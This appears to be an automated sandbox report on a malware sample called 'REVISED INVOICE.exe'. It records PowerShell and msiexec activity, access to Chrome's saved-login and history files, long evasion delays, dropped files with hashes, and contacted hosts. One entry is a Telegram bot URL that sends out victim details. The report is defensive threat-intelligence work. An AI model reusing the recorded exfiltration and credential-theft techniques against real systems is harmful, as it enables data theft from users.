Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: webio.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_06460AC8 push ebx; retf	3_2_06460AC9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_064636B5 pushfd ; iretd	3_2_064636B6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_06462082 push esp; retf	3_2_06462084
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_064608BA push ebp; ret	3_2_064608E3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_01D40AC8 push ebx; retf	5_2_01D40AC9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_01D42082 push esp; retf	5_2_01D42084
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_01D436B5 pushfd ; iretd	5_2_01D436B6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_01D408BA push ebp; ret	5_2_01D408E3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_214B21AC push ebx; iretd	5_2_214B21EA

Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5524			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4352			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2260	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3244	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3720	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3720	Thread sleep time: -1800000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3724	Thread sleep count: 282 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3724	Thread sleep count: 9537 > 30	Jump to behavior

Source: C:\Users\user\Desktop\REVISED INVOICE.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	unknown	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	false
142.250.186.142	drive.google.com	United States	15169	GOOGLEUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
142.250.186.97	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
132.226.247.73	unknown	United States	16989	UTMEMUS	false

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/173.254.250.71	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2010/24/2024%20/%208:39:12%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown

ID:	1541088
Product:	CloudBasic
Start time:	12:00:55
Start date:	24.10.2024
Sample:	REVISED INVOICE.exe
Cookbook:	default.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	8274b1a41b53bf35e0b4330a20010d4c
SHA1:	0b263f01dd3e10389cd4fe6575d114ea301ee874
SHA256:	d2320e5704e90bc713c59a0521bacf04ca5751c2481e1dd4e3a95494981d867c
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	79DC2D6859D68F13A7B81B39AA6046E9	68218BA47682E82C9E74176FDA6E7DE1525FE7E4	BAD4B8119FA526EE766BFBA3B4B62EB94B94CC4FBF3765C1DE09830F722630F5
C:\Users\user\AppData\Local\Temp\k4kdogni.3gj.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\xb55l4s3.d1s.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com	ASCII text, with very long lines (3101), with CRLF, LF line terminators	6AC57B58205D75AEE6380C3C6A8EF2A2	466480B2A43B6C6DD95253849ACAAFCEF82CA2B3	F79002317D2A561E589E0006DD549D39C71488689CE772B15F84F393926A2786
C:\Users\user\AppData\Local\fona\Kvit\REVISED INVOICE.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	8274B1A41B53BF35E0B4330A20010D4C	0B263F01DD3E10389CD4FE6575D114EA301EE874	D2320E5704E90BC713C59A0521BACF04CA5751C2481E1DD4E3A95494981D867C
C:\Users\user\AppData\Local\fona\Kvit\REVISED INVOICE.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Local\fona\Kvit\Smudgeproof.Spe	data	02093BF4E23F0DC4ED17ACE33F3071C3	FF8E59EE5EB06847411F0F11319081ACC6510F8C	2F9C4D11C84DA12FC93D685D8A1CF99F0B7C9FE42D50BCD56E08D6E4B2A8014B
C:\Users\user\AppData\Local\fona\Kvit\Underbeat.ops	data	26C2167385AF5F3AD4501DC9EB1D1750	DC579F120929FEB6743A2E708B1ECB80AB5743FC	655E599A68EC316400412338207AEE3D1E92D871D44903330831863A8422DED6
C:\Users\user\AppData\Local\fona\Kvit\chultun.sed	data	7E5D0C2FB5542434DEAA7CB9992CF70A	88C1347B18718DDFEBE207B0142337AA058088E1	042CA82320646FF84D77486DB582121776CDE3A7512AAD331C52A6F7F4477F07
C:\Users\user\AppData\Local\fona\Kvit\elapoid.lux	data	E2C31508D144E6C8890BC5DE64DBC952	358FE8FF69899E52D55F9A22DF5888BC2F53E04A	E960C13536EDA3B4833CDC97DE94BD4505EBB2BDE345F8301108D7B02A6C3695
C:\Users\user\AppData\Local\fona\Kvit\netadressers.hul	data	7B108EEEC00B60944878785541310B37	18679F477149CF4571D581FE5F402C2320B31059	FADFB5887AE6B54C07F264798945B3D33DB6EC9A9A70C26B585149EF5E8CE972
C:\Users\user\AppData\Local\fona\Kvit\organets.ind	data	535051A54B823E39736D2B2F2AEC56D4	07507B4404013195F3A7262BBEB84AFB9FF73044	807FBB6EF44B4D318DBBA4AB3B4818E1000A2ABBEEC1A82EB6010A169C8F4541
C:\Users\user\AppData\Local\fona\Kvit\politurernes.jor	data	8403F4E4069E57FA2AF93BB477EC2F5B	F52F9A97B6FE053E998F33C8D7DFEBB858E30DB7	BE5DE0ACA1AC614A1F7EE90CB06C629778D368785317AF8531DBFFC946AC5D97
C:\Users\user\AppData\Local\fona\Kvit\prior.txt	ASCII text, with very long lines (326), with CRLF line terminators	7875B155DEAAF5AE952F60A1169B67A3	09EB123FC93CDA5A858C436469D32B0E251789CE	AD0681420C18CF905F792608B5313422142D34A7984283D47FBE5AEBEE2FCD50
C:\Users\user\AppData\Local\fona\Kvit\testprocedurer.syn	data	B36381C40D4A5D90C8B2E712830D6634	20E8D57DC3B4F524727C115B48A176DBA40A24AA	FEB96AEF8BB072A8E8472A19508B424D04159389E1EA55DA73DA22C958100963
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\depoh.lnk	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide	BFCEADD506F2A222716599DC14984F07	341ED5B68587FA192D7A8B679BFD793B1BB6B24E	B0A11DD62395416C7955F41BDF83DE7EE533C2272FF86B2187A118393D71D7A6

Windows Analysis Report REVISED INVOICE.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

